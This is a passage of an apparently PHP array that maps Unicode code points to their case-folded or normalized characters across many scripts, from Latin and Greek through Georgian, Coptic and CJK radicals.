'ŕ', 342 => 'ŗ', 344 => 'ř', 346 => 'ś', 348 => 'ŝ', 350 => 'ş', 352 => 'š', 354 => 'ţ', 356 => 'ť', 358 => 'ŧ', 360 => 'ũ', 362 => 'ū', 364 => 'ŭ', 366 => 'ů', 368 => 'ű', 370 => 'ų', 372 => 'ŵ', 374 => 'ŷ', 376 => 'ÿ', 377 => 'ź', 379 => 'ż', 381 => 'ž', 383 => 's', 385 => 'ɓ', 386 => 'ƃ', 388 => 'ƅ', 390 => 'ɔ', 391 => 'ƈ', 393 => 'ɖ', 394 => 'ɗ', 395 => 'ƌ', 398 => 'ǝ', 399 => 'ə', 400 => 'ɛ', 401 => 'ƒ', 403 => 'ɠ', 404 => 'ɣ', 406 => 'ɩ', 407 => 'ɨ', 408 => 'ƙ', 412 => 'ɯ', 413 => 'ɲ', 415 => 'ɵ', 416 => 'ơ', 418 => 'ƣ', 420 => 'ƥ', 422 => 'ʀ', 423 => 'ƨ', 425 => 'ʃ', 428 => 'ƭ', 430 => 'ʈ', 431 => 'ư', 433 => 'ʊ', 434 => 'ʋ', 435 => 'ƴ', 437 => 'ƶ', 439 => 'ʒ', 440 => 'ƹ', 444 => 'ƽ', 452 => 'dž', 453 => 'dž', 454 => 'dž', 455 => 'lj', 456 => 'lj', 457 => 'lj', 458 => 'nj', 459 => 'nj', 460 => 'nj', 461 => 'ǎ', 463 => 'ǐ', 465 => 'ǒ', 467 => 'ǔ', 469 => 'ǖ', 471 => 'ǘ', 473 => 'ǚ', 475 => 'ǜ', 478 => 'ǟ', 480 => 'ǡ', 482 => 'ǣ', 484 => 'ǥ', 486 => 'ǧ', 488 => 'ǩ', 490 => 'ǫ', 492 => 'ǭ', 494 => 'ǯ', 497 => 'dz', 498 => 'dz', 499 => 'dz', 500 => 'ǵ', 502 => 'ƕ', 503 => 'ƿ', 504 => 'ǹ', 506 => 'ǻ', 508 => 'ǽ', 510 => 'ǿ', 512 => 'ȁ', 514 => 'ȃ', 516 => 'ȅ', 518 => 'ȇ', 520 => 'ȉ', 522 => 'ȋ', 524 => 'ȍ', 526 => 'ȏ', 528 => 'ȑ', 530 => 'ȓ', 532 => 'ȕ', 534 => 'ȗ', 536 => 'ș', 538 => 'ț', 540 => 'ȝ', 542 => 'ȟ', 544 => 'ƞ', 546 => 'ȣ', 548 => 'ȥ', 550 => 'ȧ', 552 => 'ȩ', 554 => 'ȫ', 556 => 'ȭ', 558 => 'ȯ', 560 => 'ȱ', 562 => 'ȳ', 570 => 'ⱥ', 571 => 'ȼ', 573 => 'ƚ', 574 => 'ⱦ', 577 => 'ɂ', 579 => 'ƀ', 580 => 'ʉ', 581 => 'ʌ', 582 => 'ɇ', 584 => 'ɉ', 586 => 'ɋ', 588 => 'ɍ', 590 => 'ɏ', 688 => 'h', 689 => 'ɦ', 690 => 'j', 691 => 'r', 692 => 'ɹ', 693 => 'ɻ', 694 => 'ʁ', 695 => 'w', 696 => 'y', 736 => 'ɣ', 737 => 'l', 738 => 's', 739 => 'x', 740 => 'ʕ', 832 => '̀', 833 => '́', 835 => '̓', 836 => '̈́', 837 => 'ι', 880 => 'ͱ', 882 => 'ͳ', 884 => 'ʹ', 886 => 'ͷ', 895 => 'ϳ', 902 => 'ά', 903 => '·', 904 => 'έ', 905 => 'ή', 906 => 'ί', 908 => 'ό', 910 => 'ύ', 911 => 'ώ', 913 => 'α', 914 => 'β', 915 => 'γ', 916 => 'δ', 917 => 'ε', 918 => 'ζ', 919 => 'η', 920 => 'θ', 921 => 'ι', 922 => 'κ', 923 => 'λ', 924 => 'μ', 925 => 'ν', 926 => 'ξ', 927 => 'ο', 928 => 'π', 929 => 'ρ', 931 => 'σ', 932 => 'τ', 933 => 'υ', 934 => 'φ', 935 => 'χ', 936 => 'ψ', 937 => 'ω', 938 => 'ϊ', 939 => 'ϋ', 975 => 'ϗ', 976 => 'β', 977 => 'θ', 978 => 'υ', 979 => 'ύ', 980 => 'ϋ', 981 => 'φ', 982 => 'π', 984 => 'ϙ', 986 => 'ϛ', 988 => 'ϝ', 990 => 'ϟ', 992 => 'ϡ', 994 => 'ϣ', 996 => 'ϥ', 998 => 'ϧ', 1000 => 'ϩ', 1002 => 'ϫ', 1004 => 'ϭ', 1006 => 'ϯ', 1008 => 'κ', 1009 => 'ρ', 1010 => 'σ', 1012 => 'θ', 1013 => 'ε', 1015 => 'ϸ', 1017 => 'σ', 1018 => 'ϻ', 1021 => 'ͻ', 1022 => 'ͼ', 1023 => 'ͽ', 1024 => 'ѐ', 1025 => 'ё', 1026 => 'ђ', 1027 => 'ѓ', 1028 => 'є', 1029 => 'ѕ', 1030 => 'і', 1031 => 'ї', 1032 => 'ј', 1033 => 'љ', 1034 => 'њ', 1035 => 'ћ', 1036 => 'ќ', 1037 => 'ѝ', 1038 => 'ў', 1039 => 'џ', 1040 => 'а', 1041 => 'б', 1042 => 'в', 1043 => 'г', 1044 => 'д', 1045 => 'е', 1046 => 'ж', 1047 => 'з', 1048 => 'и', 1049 => 'й', 1050 => 'к', 1051 => 'л', 1052 => 'м', 1053 => 'н', 1054 => 'о', 1055 => 'п', 1056 => 'р', 1057 => 'с', 1058 => 'т', 1059 => 'у', 1060 => 'ф', 1061 => 'х', 1062 => 'ц', 1063 => 'ч', 1064 => 'ш', 1065 => 'щ', 1066 => 'ъ', 1067 => 'ы', 1068 => 'ь', 1069 => 'э', 1070 => 'ю', 1071 => 'я', 1120 => 'ѡ', 1122 => 'ѣ', 1124 => 'ѥ', 1126 => 'ѧ', 1128 => 'ѩ', 1130 => 'ѫ', 1132 => 'ѭ', 1134 => 'ѯ', 1136 => 'ѱ', 1138 => 'ѳ', 1140 => 'ѵ', 1142 => 'ѷ', 1144 => 'ѹ', 1146 => 'ѻ', 1148 => 'ѽ', 1150 => 'ѿ', 1152 => 'ҁ', 1162 => 'ҋ', 1164 => 'ҍ', 1166 => 'ҏ', 1168 => 'ґ', 1170 => 'ғ', 1172 => 'ҕ', 1174 => 'җ', 1176 => 'ҙ', 1178 => 'қ', 1180 => 'ҝ', 1182 => 'ҟ', 1184 => 'ҡ', 1186 => 'ң', 1188 => 'ҥ', 1190 => 'ҧ', 1192 => 'ҩ', 1194 => 'ҫ', 1196 => 'ҭ', 1198 => 'ү', 1200 => 'ұ', 1202 => 'ҳ', 1204 => 'ҵ', 1206 => 'ҷ', 1208 => 'ҹ', 1210 => 'һ', 1212 => 'ҽ', 1214 => 'ҿ', 1217 => 'ӂ', 1219 => 'ӄ', 1221 => 'ӆ', 1223 => 'ӈ', 1225 => 'ӊ', 1227 => 'ӌ', 1229 => 'ӎ', 1232 => 'ӑ', 1234 => 'ӓ', 1236 => 'ӕ', 1238 => 'ӗ', 1240 => 'ә', 1242 => 'ӛ', 1244 => 'ӝ', 1246 => 'ӟ', 1248 => 'ӡ', 1250 => 'ӣ', 1252 => 'ӥ', 1254 => 'ӧ', 1256 => 'ө', 1258 => 'ӫ', 1260 => 'ӭ', 1262 => 'ӯ', 1264 => 'ӱ', 1266 => 'ӳ', 1268 => 'ӵ', 1270 => 'ӷ', 1272 => 'ӹ', 1274 => 'ӻ', 1276 => 'ӽ', 1278 => 'ӿ', 1280 => 'ԁ', 1282 => 'ԃ', 1284 => 'ԅ', 1286 => 'ԇ', 1288 => 'ԉ', 1290 => 'ԋ', 1292 => 'ԍ', 1294 => 'ԏ', 1296 => 'ԑ', 1298 => 'ԓ', 1300 => 'ԕ', 1302 => 'ԗ', 1304 => 'ԙ', 1306 => 'ԛ', 1308 => 'ԝ', 1310 => 'ԟ', 1312 => 'ԡ', 1314 => 'ԣ', 1316 => 'ԥ', 1318 => 'ԧ', 1320 => 'ԩ', 1322 => 'ԫ', 1324 => 'ԭ', 1326 => 'ԯ', 1329 => 'ա', 1330 => 'բ', 1331 => 'գ', 1332 => 'դ', 1333 => 'ե', 1334 => 'զ', 1335 => 'է', 1336 => 'ը', 1337 => 'թ', 1338 => 'ժ', 1339 => 'ի', 1340 => 'լ', 1341 => 'խ', 1342 => 'ծ', 1343 => 'կ', 1344 => 'հ', 1345 => 'ձ', 1346 => 'ղ', 1347 => 'ճ', 1348 => 'մ', 1349 => 'յ', 1350 => 'ն', 1351 => 'շ', 1352 => 'ո', 1353 => 'չ', 1354 => 'պ', 1355 => 'ջ', 1356 => 'ռ', 1357 => 'ս', 1358 => 'վ', 1359 => 'տ', 1360 => 'ր', 1361 => 'ց', 1362 => 'ւ', 1363 => 'փ', 1364 => 'ք', 1365 => 'օ', 1366 => 'ֆ', 1415 => 'եւ', 1653 => 'اٴ', 1654 => 'وٴ', 1655 => 'ۇٴ', 1656 => 'يٴ', 2392 => 'क़', 2393 => 'ख़', 2394 => 'ग़', 2395 => 'ज़', 2396 => 'ड़', 2397 => 'ढ़', 2398 => 'फ़', 2399 => 'य़', 2524 => 'ড়', 2525 => 'ঢ়', 2527 => 'য়', 2611 => 'ਲ਼', 2614 => 'ਸ਼', 2649 => 'ਖ਼', 2650 => 'ਗ਼', 2651 => 'ਜ਼', 2654 => 'ਫ਼', 2908 => 'ଡ଼', 2909 => 'ଢ଼', 3635 => 'ํา', 3763 => 'ໍາ', 3804 => 'ຫນ', 3805 => 'ຫມ', 3852 => '་', 3907 => 'གྷ', 3917 => 'ཌྷ', 3922 => 'དྷ', 3927 => 'བྷ', 3932 => 'ཛྷ', 3945 => 'ཀྵ', 3955 => 'ཱི', 3957 => 'ཱུ', 3958 => 'ྲྀ', 3959 => 'ྲཱྀ', 3960 => 'ླྀ', 3961 => 'ླཱྀ', 3969 => 'ཱྀ', 3987 => 'ྒྷ', 3997 => 'ྜྷ', 4002 => 'ྡྷ', 4007 => 'ྦྷ', 4012 => 'ྫྷ', 4025 => 'ྐྵ', 4295 => 'ⴧ', 4301 => 'ⴭ', 4348 => 'ნ', 5112 => 'Ᏸ', 5113 => 'Ᏹ', 5114 => 'Ᏺ', 5115 => 'Ᏻ', 5116 => 'Ᏼ', 5117 => 'Ᏽ', 7296 => 'в', 7297 => 'д', 7298 => 'о', 7299 => 'с', 7300 => 'т', 7301 => 'т', 7302 => 'ъ', 7303 => 'ѣ', 7304 => 'ꙋ', 7312 => 'ა', 7313 => 'ბ', 7314 => 'გ', 7315 => 'დ', 7316 => 'ე', 7317 => 'ვ', 7318 => 'ზ', 7319 => 'თ', 7320 => 'ი', 7321 => 'კ', 7322 => 'ლ', 7323 => 'მ', 7324 => 'ნ', 7325 => 'ო', 7326 => 'პ', 7327 => 'ჟ', 7328 => 'რ', 7329 => 'ს', 7330 => 'ტ', 7331 => 'უ', 7332 => 'ფ', 7333 => 'ქ', 7334 => 'ღ', 7335 => 'ყ', 7336 => 'შ', 7337 => 'ჩ', 7338 => 'ც', 7339 => 'ძ', 7340 => 'წ', 7341 => 'ჭ', 7342 => 'ხ', 7343 => 'ჯ', 7344 => 'ჰ', 7345 => 'ჱ', 7346 => 'ჲ', 7347 => 'ჳ', 7348 => 'ჴ', 7349 => 'ჵ', 7350 => 'ჶ', 7351 => 'ჷ', 7352 => 'ჸ', 7353 => 'ჹ', 7354 => 'ჺ', 7357 => 'ჽ', 7358 => 'ჾ', 7359 => 'ჿ', 7468 => 'a', 7469 => 'æ', 7470 => 'b', 7472 => 'd', 7473 => 'e', 7474 => 'ǝ', 7475 => 'g', 7476 => 'h', 7477 => 'i', 7478 => 'j', 7479 => 'k', 7480 => 'l', 7481 => 'm', 7482 => 'n', 7484 => 'o', 7485 => 'ȣ', 7486 => 'p', 7487 => 'r', 7488 => 't', 7489 => 'u', 7490 => 'w', 7491 => 'a', 7492 => 'ɐ', 7493 => 'ɑ', 7494 => 'ᴂ', 7495 => 'b', 7496 => 'd', 7497 => 'e', 7498 => 'ə', 7499 => 'ɛ', 7500 => 'ɜ', 7501 => 'g', 7503 => 'k', 7504 => 'm', 7505 => 'ŋ', 7506 => 'o', 7507 => 'ɔ', 7508 => 'ᴖ', 7509 => 'ᴗ', 7510 => 'p', 7511 => 't', 7512 => 'u', 7513 => 'ᴝ', 7514 => 'ɯ', 7515 => 'v', 7516 => 'ᴥ', 7517 => 'β', 7518 => 'γ', 7519 => 'δ', 7520 => 'φ', 7521 => 'χ', 7522 => 'i', 7523 => 'r', 7524 => 'u', 7525 => 'v', 7526 => 'β', 7527 => 'γ', 7528 => 'ρ', 7529 => 'φ', 7530 => 'χ', 7544 => 'н', 7579 => 'ɒ', 7580 => 'c', 7581 => 'ɕ', 7582 => 'ð', 7583 => 'ɜ', 7584 => 'f', 7585 => 'ɟ', 7586 => 'ɡ', 7587 => 'ɥ', 7588 => 'ɨ', 7589 => 'ɩ', 7590 => 'ɪ', 7591 => 'ᵻ', 7592 => 'ʝ', 7593 => 'ɭ', 7594 => 'ᶅ', 7595 => 'ʟ', 7596 => 'ɱ', 7597 => 'ɰ', 7598 => 'ɲ', 7599 => 'ɳ', 7600 => 'ɴ', 7601 => 'ɵ', 7602 => 'ɸ', 7603 => 'ʂ', 7604 => 'ʃ', 7605 => 'ƫ', 7606 => 'ʉ', 7607 => 'ʊ', 7608 => 'ᴜ', 7609 => 'ʋ', 7610 => 'ʌ', 7611 => 'z', 7612 => 'ʐ', 7613 => 'ʑ', 7614 => 'ʒ', 7615 => 'θ', 7680 => 'ḁ', 7682 => 'ḃ', 7684 => 'ḅ', 7686 => 'ḇ', 7688 => 'ḉ', 7690 => 'ḋ', 7692 => 'ḍ', 7694 => 'ḏ', 7696 => 'ḑ', 7698 => 'ḓ', 7700 => 'ḕ', 7702 => 'ḗ', 7704 => 'ḙ', 7706 => 'ḛ', 7708 => 'ḝ', 7710 => 'ḟ', 7712 => 'ḡ', 7714 => 'ḣ', 7716 => 'ḥ', 7718 => 'ḧ', 7720 => 'ḩ', 7722 => 'ḫ', 7724 => 'ḭ', 7726 => 'ḯ', 7728 => 'ḱ', 7730 => 'ḳ', 7732 => 'ḵ', 7734 => 'ḷ', 7736 => 'ḹ', 7738 => 'ḻ', 7740 => 'ḽ', 7742 => 'ḿ', 7744 => 'ṁ', 7746 => 'ṃ', 7748 => 'ṅ', 7750 => 'ṇ', 7752 => 'ṉ', 7754 => 'ṋ', 7756 => 'ṍ', 7758 => 'ṏ', 7760 => 'ṑ', 7762 => 'ṓ', 7764 => 'ṕ', 7766 => 'ṗ', 7768 => 'ṙ', 7770 => 'ṛ', 7772 => 'ṝ', 7774 => 'ṟ', 7776 => 'ṡ', 7778 => 'ṣ', 7780 => 'ṥ', 7782 => 'ṧ', 7784 => 'ṩ', 7786 => 'ṫ', 7788 => 'ṭ', 7790 => 'ṯ', 7792 => 'ṱ', 7794 => 'ṳ', 7796 => 'ṵ', 7798 => 'ṷ', 7800 => 'ṹ', 7802 => 'ṻ', 7804 => 'ṽ', 7806 => 'ṿ', 7808 => 'ẁ', 7810 => 'ẃ', 7812 => 'ẅ', 7814 => 'ẇ', 7816 => 'ẉ', 7818 => 'ẋ', 7820 => 'ẍ', 7822 => 'ẏ', 7824 => 'ẑ', 7826 => 'ẓ', 7828 => 'ẕ', 7834 => 'aʾ', 7835 => 'ṡ', 7838 => 'ss', 7840 => 'ạ', 7842 => 'ả', 7844 => 'ấ', 7846 => 'ầ', 7848 => 'ẩ', 7850 => 'ẫ', 7852 => 'ậ', 7854 => 'ắ', 7856 => 'ằ', 7858 => 'ẳ', 7860 => 'ẵ', 7862 => 'ặ', 7864 => 'ẹ', 7866 => 'ẻ', 7868 => 'ẽ', 7870 => 'ế', 7872 => 'ề', 7874 => 'ể', 7876 => 'ễ', 7878 => 'ệ', 7880 => 'ỉ', 7882 => 'ị', 7884 => 'ọ', 7886 => 'ỏ', 7888 => 'ố', 7890 => 'ồ', 7892 => 'ổ', 7894 => 'ỗ', 7896 => 'ộ', 7898 => 'ớ', 7900 => 'ờ', 7902 => 'ở', 7904 => 'ỡ', 7906 => 'ợ', 7908 => 'ụ', 7910 => 'ủ', 7912 => 'ứ', 7914 => 'ừ', 7916 => 'ử', 7918 => 'ữ', 7920 => 'ự', 7922 => 'ỳ', 7924 => 'ỵ', 7926 => 'ỷ', 7928 => 'ỹ', 7930 => 'ỻ', 7932 => 'ỽ', 7934 => 'ỿ', 7944 => 'ἀ', 7945 => 'ἁ', 7946 => 'ἂ', 7947 => 'ἃ', 7948 => 'ἄ', 7949 => 'ἅ', 7950 => 'ἆ', 7951 => 'ἇ', 7960 => 'ἐ', 7961 => 'ἑ', 7962 => 'ἒ', 7963 => 'ἓ', 7964 => 'ἔ', 7965 => 'ἕ', 7976 => 'ἠ', 7977 => 'ἡ', 7978 => 'ἢ', 7979 => 'ἣ', 7980 => 'ἤ', 7981 => 'ἥ', 7982 => 'ἦ', 7983 => 'ἧ', 7992 => 'ἰ', 7993 => 'ἱ', 7994 => 'ἲ', 7995 => 'ἳ', 7996 => 'ἴ', 7997 => 'ἵ', 7998 => 'ἶ', 7999 => 'ἷ', 8008 => 'ὀ', 8009 => 'ὁ', 8010 => 'ὂ', 8011 => 'ὃ', 8012 => 'ὄ', 8013 => 'ὅ', 8025 => 'ὑ', 8027 => 'ὓ', 8029 => 'ὕ', 8031 => 'ὗ', 8040 => 'ὠ', 8041 => 'ὡ', 8042 => 'ὢ', 8043 => 'ὣ', 8044 => 'ὤ', 8045 => 'ὥ', 8046 => 'ὦ', 8047 => 'ὧ', 8049 => 'ά', 8051 => 'έ', 8053 => 'ή', 8055 => 'ί', 8057 => 'ό', 8059 => 'ύ', 8061 => 'ώ', 8064 => 'ἀι', 8065 => 'ἁι', 8066 => 'ἂι', 8067 => 'ἃι', 8068 => 'ἄι', 8069 => 'ἅι', 8070 => 'ἆι', 8071 => 'ἇι', 8072 => 'ἀι', 8073 => 'ἁι', 8074 => 'ἂι', 8075 => 'ἃι', 8076 => 'ἄι', 8077 => 'ἅι', 8078 => 'ἆι', 8079 => 'ἇι', 8080 => 'ἠι', 8081 => 'ἡι', 8082 => 'ἢι', 8083 => 'ἣι', 8084 => 'ἤι', 8085 => 'ἥι', 8086 => 'ἦι', 8087 => 'ἧι', 8088 => 'ἠι', 8089 => 'ἡι', 8090 => 'ἢι', 8091 => 'ἣι', 8092 => 'ἤι', 8093 => 'ἥι', 8094 => 'ἦι', 8095 => 'ἧι', 8096 => 'ὠι', 8097 => 'ὡι', 8098 => 'ὢι', 8099 => 'ὣι', 8100 => 'ὤι', 8101 => 'ὥι', 8102 => 'ὦι', 8103 => 'ὧι', 8104 => 'ὠι', 8105 => 'ὡι', 8106 => 'ὢι', 8107 => 'ὣι', 8108 => 'ὤι', 8109 => 'ὥι', 8110 => 'ὦι', 8111 => 'ὧι', 8114 => 'ὰι', 8115 => 'αι', 8116 => 'άι', 8119 => 'ᾶι', 8120 => 'ᾰ', 8121 => 'ᾱ', 8122 => 'ὰ', 8123 => 'ά', 8124 => 'αι', 8126 => 'ι', 8130 => 'ὴι', 8131 => 'ηι', 8132 => 'ήι', 8135 => 'ῆι', 8136 => 'ὲ', 8137 => 'έ', 8138 => 'ὴ', 8139 => 'ή', 8140 => 'ηι', 8147 => 'ΐ', 8152 => 'ῐ', 8153 => 'ῑ', 8154 => 'ὶ', 8155 => 'ί', 8163 => 'ΰ', 8168 => 'ῠ', 8169 => 'ῡ', 8170 => 'ὺ', 8171 => 'ύ', 8172 => 'ῥ', 8178 => 'ὼι', 8179 => 'ωι', 8180 => 'ώι', 8183 => 'ῶι', 8184 => 'ὸ', 8185 => 'ό', 8186 => 'ὼ', 8187 => 'ώ', 8188 => 'ωι', 8209 => '‐', 8243 => '′′', 8244 => '′′′', 8246 => '‵‵', 8247 => '‵‵‵', 8279 => '′′′′', 8304 => '0', 8305 => 'i', 8308 => '4', 8309 => '5', 8310 => '6', 8311 => '7', 8312 => '8', 8313 => '9', 8315 => '−', 8319 => 'n', 8320 => '0', 8321 => '1', 8322 => '2', 8323 => '3', 8324 => '4', 8325 => '5', 8326 => '6', 8327 => '7', 8328 => '8', 8329 => '9', 8331 => '−', 8336 => 'a', 8337 => 'e', 8338 => 'o', 8339 => 'x', 8340 => 'ə', 8341 => 'h', 8342 => 'k', 8343 => 'l', 8344 => 'm', 8345 => 'n', 8346 => 'p', 8347 => 's', 8348 => 't', 8360 => 'rs', 8450 => 'c', 8451 => '°c', 8455 => 'ɛ', 8457 => '°f', 8458 => 'g', 8459 => 'h', 8460 => 'h', 8461 => 'h', 8462 => 'h', 8463 => 'ħ', 8464 => 'i', 8465 => 'i', 8466 => 'l', 8467 => 'l', 8469 => 'n', 8470 => 'no', 8473 => 'p', 8474 => 'q', 8475 => 'r', 8476 => 'r', 8477 => 'r', 8480 => 'sm', 8481 => 'tel', 8482 => 'tm', 8484 => 'z', 8486 => 'ω', 8488 => 'z', 8490 => 'k', 8491 => 'å', 8492 => 'b', 8493 => 'c', 8495 => 'e', 8496 => 'e', 8497 => 'f', 8499 => 'm', 8500 => 'o', 8501 => 'א', 8502 => 'ב', 8503 => 'ג', 8504 => 'ד', 8505 => 'i', 8507 => 'fax', 8508 => 'π', 8509 => 'γ', 8510 => 'γ', 8511 => 'π', 8512 => '∑', 8517 => 'd', 8518 => 'd', 8519 => 'e', 8520 => 'i', 8521 => 'j', 8528 => '1⁄7', 8529 => '1⁄9', 8530 => '1⁄10', 8531 => '1⁄3', 8532 => '2⁄3', 8533 => '1⁄5', 8534 => '2⁄5', 8535 => '3⁄5', 8536 => '4⁄5', 8537 => '1⁄6', 8538 => '5⁄6', 8539 => '1⁄8', 8540 => '3⁄8', 8541 => '5⁄8', 8542 => '7⁄8', 8543 => '1⁄', 8544 => 'i', 8545 => 'ii', 8546 => 'iii', 8547 => 'iv', 8548 => 'v', 8549 => 'vi', 8550 => 'vii', 8551 => 'viii', 8552 => 'ix', 8553 => 'x', 8554 => 'xi', 8555 => 'xii', 8556 => 'l', 8557 => 'c', 8558 => 'd', 8559 => 'm', 8560 => 'i', 8561 => 'ii', 8562 => 'iii', 8563 => 'iv', 8564 => 'v', 8565 => 'vi', 8566 => 'vii', 8567 => 'viii', 8568 => 'ix', 8569 => 'x', 8570 => 'xi', 8571 => 'xii', 8572 => 'l', 8573 => 'c', 8574 => 'd', 8575 => 'm', 8585 => '0⁄3', 8748 => '∫∫', 8749 => '∫∫∫', 8751 => '∮∮', 8752 => '∮∮∮', 9001 => '〈', 9002 => '〉', 9312 => '1', 9313 => '2', 9314 => '3', 9315 => '4', 9316 => '5', 9317 => '6', 9318 => '7', 9319 => '8', 9320 => '9', 9321 => '10', 9322 => '11', 9323 => '12', 9324 => '13', 9325 => '14', 9326 => '15', 9327 => '16', 9328 => '17', 9329 => '18', 9330 => '19', 9331 => '20', 9398 => 'a', 9399 => 'b', 9400 => 'c', 9401 => 'd', 9402 => 'e', 9403 => 'f', 9404 => 'g', 9405 => 'h', 9406 => 'i', 9407 => 'j', 9408 => 'k', 9409 => 'l', 9410 => 'm', 9411 => 'n', 9412 => 'o', 9413 => 'p', 9414 => 'q', 9415 => 'r', 9416 => 's', 9417 => 't', 9418 => 'u', 9419 => 'v', 9420 => 'w', 9421 => 'x', 9422 => 'y', 9423 => 'z', 9424 => 'a', 9425 => 'b', 9426 => 'c', 9427 => 'd', 9428 => 'e', 9429 => 'f', 9430 => 'g', 9431 => 'h', 9432 => 'i', 9433 => 'j', 9434 => 'k', 9435 => 'l', 9436 => 'm', 9437 => 'n', 9438 => 'o', 9439 => 'p', 9440 => 'q', 9441 => 'r', 9442 => 's', 9443 => 't', 9444 => 'u', 9445 => 'v', 9446 => 'w', 9447 => 'x', 9448 => 'y', 9449 => 'z', 9450 => '0', 10764 => '∫∫∫∫', 10972 => '⫝̸', 11264 => 'ⰰ', 11265 => 'ⰱ', 11266 => 'ⰲ', 11267 => 'ⰳ', 11268 => 'ⰴ', 11269 => 'ⰵ', 11270 => 'ⰶ', 11271 => 'ⰷ', 11272 => 'ⰸ', 11273 => 'ⰹ', 11274 => 'ⰺ', 11275 => 'ⰻ', 11276 => 'ⰼ', 11277 => 'ⰽ', 11278 => 'ⰾ', 11279 => 'ⰿ', 11280 => 'ⱀ', 11281 => 'ⱁ', 11282 => 'ⱂ', 11283 => 'ⱃ', 11284 => 'ⱄ', 11285 => 'ⱅ', 11286 => 'ⱆ', 11287 => 'ⱇ', 11288 => 'ⱈ', 11289 => 'ⱉ', 11290 => 'ⱊ', 11291 => 'ⱋ', 11292 => 'ⱌ', 11293 => 'ⱍ', 11294 => 'ⱎ', 11295 => 'ⱏ', 11296 => 'ⱐ', 11297 => 'ⱑ', 11298 => 'ⱒ', 11299 => 'ⱓ', 11300 => 'ⱔ', 11301 => 'ⱕ', 11302 => 'ⱖ', 11303 => 'ⱗ', 11304 => 'ⱘ', 11305 => 'ⱙ', 11306 => 'ⱚ', 11307 => 'ⱛ', 11308 => 'ⱜ', 11309 => 'ⱝ', 11310 => 'ⱞ', 11360 => 'ⱡ', 11362 => 'ɫ', 11363 => 'ᵽ', 11364 => 'ɽ', 11367 => 'ⱨ', 11369 => 'ⱪ', 11371 => 'ⱬ', 11373 => 'ɑ', 11374 => 'ɱ', 11375 => 'ɐ', 11376 => 'ɒ', 11378 => 'ⱳ', 11381 => 'ⱶ', 11388 => 'j', 11389 => 'v', 11390 => 'ȿ', 11391 => 'ɀ', 11392 => 'ⲁ', 11394 => 'ⲃ', 11396 => 'ⲅ', 11398 => 'ⲇ', 11400 => 'ⲉ', 11402 => 'ⲋ', 11404 => 'ⲍ', 11406 => 'ⲏ', 11408 => 'ⲑ', 11410 => 'ⲓ', 11412 => 'ⲕ', 11414 => 'ⲗ', 11416 => 'ⲙ', 11418 => 'ⲛ', 11420 => 'ⲝ', 11422 => 'ⲟ', 11424 => 'ⲡ', 11426 => 'ⲣ', 11428 => 'ⲥ', 11430 => 'ⲧ', 11432 => 'ⲩ', 11434 => 'ⲫ', 11436 => 'ⲭ', 11438 => 'ⲯ', 11440 => 'ⲱ', 11442 => 'ⲳ', 11444 => 'ⲵ', 11446 => 'ⲷ', 11448 => 'ⲹ', 11450 => 'ⲻ', 11452 => 'ⲽ', 11454 => 'ⲿ', 11456 => 'ⳁ', 11458 => 'ⳃ', 11460 => 'ⳅ', 11462 => 'ⳇ', 11464 => 'ⳉ', 11466 => 'ⳋ', 11468 => 'ⳍ', 11470 => 'ⳏ', 11472 => 'ⳑ', 11474 => 'ⳓ', 11476 => 'ⳕ', 11478 => 'ⳗ', 11480 => 'ⳙ', 11482 => 'ⳛ', 11484 => 'ⳝ', 11486 => 'ⳟ', 11488 => 'ⳡ', 11490 => 'ⳣ', 11499 => 'ⳬ', 11501 => 'ⳮ', 11506 => 'ⳳ', 11631 => 'ⵡ', 11935 => '母', 12019 => '龟', 12032 => '一', 12033 => '丨', 12034 => '丶', 12035 => '丿', 12036 => '乙', 12037 => '亅', 12038 => '二', 12039 => '亠', 12040 => '人', 12041 => '儿', 12042 => '入', 12043 => '八', 12044 => '冂', 12045 => '冖', 12046 => '冫', 12047 => '几', 12048 => '凵', 12049 => '刀', 12050 => '力', 12051 => '勹', 12052 => '匕', 12053 => '匚', 12054 => '匸', 12055 => '十', 12056 => '卜', 12057 => '卩', 12058 => '厂', 12059 => '厶', 12060 => '又', 12061 => '口', 12062 => '囗', 12063 => '土', 12064 => '士', 12065 => '夂', 12066 => '夊', 12067 => '夕', 12068 => '大', 12069 => '女', 12070 => '子', 12071 => '宀', 12072 => '寸', 12073 => '小', 12074 => '尢', 12075 => '尸', 12076 => '屮', 12077 => '山', 12078 => '巛', 12079 => '工', 12080 => '己', 12081 => '巾', 12082 => '干', 12083 => '幺', 12084 => '广', 12085 => '廴', 12086 => '廾', 12087 => '弋', 12088 => '弓', 12089 => '彐', 12090 => '彡', 12091 => '彳', 12092 => '心', 12093 => '戈', 12094 => '戶', 12095 => '手', 12096 => '支', 12097 => '攴', 12098 => '文', 12099 => '斗', 12100 => '斤', 12101 => '方', 12102 => '无', 12103 => '日', 12104 => '曰', 12105 => '月', 12106 => '木', 12107 => '欠', 12108 => '止', 12109 => '歹', 12110 => '殳', 12111 => '毋', 12112 => '比', 12113 => '毛', 12114 => '氏', 12115 => '气', 12116 => '水', 12117 => '火', 12118 => '爪', 12119 => '父', 12120 => '爻', 12121 => '爿', 12122 => '片', 12123 => '牙', 12124 => '牛', 12125 => '犬', 12126 => '玄', 12127 => '玉', 12128 => '瓜', 12129 => '瓦', 12130 => '甘', 12131 => '生', 12132 => '用', 12133 => '田', 12134 => '疋', 12135 => '疒', 12136 => '癶', 12137 => '白', 12138 => '皮', 12139 => '皿', 12140 => '目', 12141 => '矛', 12142 => '矢', 12143 => '石', 12144 => '示', 12145 => '禸', 12146 => '禾', 12147 => '穴', 12148 => '立', 12149 => '竹', 12150 => '米', 12151 => '糸', 12152 => '缶', 12153 => '网', 12154 => '羊', 12155 => '羽', 12156 => '老', 12157 => '而', 12158 => '耒', 12159 => '耳', 12160 => '聿', 12161 => '肉', 12162 => '臣', 12163 => '自', 12164 => '至', 12165 => '臼', 12166 => '舌', 12167 => '舛', 12168 => '舟', 12169 => '艮', 12170 => '色', 12171 => '艸', 12172 => '虍', 12173 => '虫', 12174 => '血', 12175 => '行', 12176 => '衣', 12177 => '襾', 12178 => '見', 12179 => '角', 12180 => '言', 12181 => '谷', 12182 => '豆', 12183 => '豕', 12184 => '豸', 12185 => '貝', 12186 => '赤', 12187 => '走', 12188 => '足', 12189 => '身', 12190 => '車', 12191 => '辛', 12192 => '辰', 12193 => '辵', 12194 => '邑', 12195 => '酉', 12196 => '釆', 12197 => '里', 12198 => '金', 12199 => '長', 12200 => '門', 12201 => '阜', 12202 => '隶', 12203 => '隹', 12204 => '雨', 12205 => '靑', 12206 => '非', 12207 => '面', 12208 => '革', 12209 => '韋', 12210 => '韭', 12211 => '音', 12212 => '頁', 12213 => '風', 12214 => 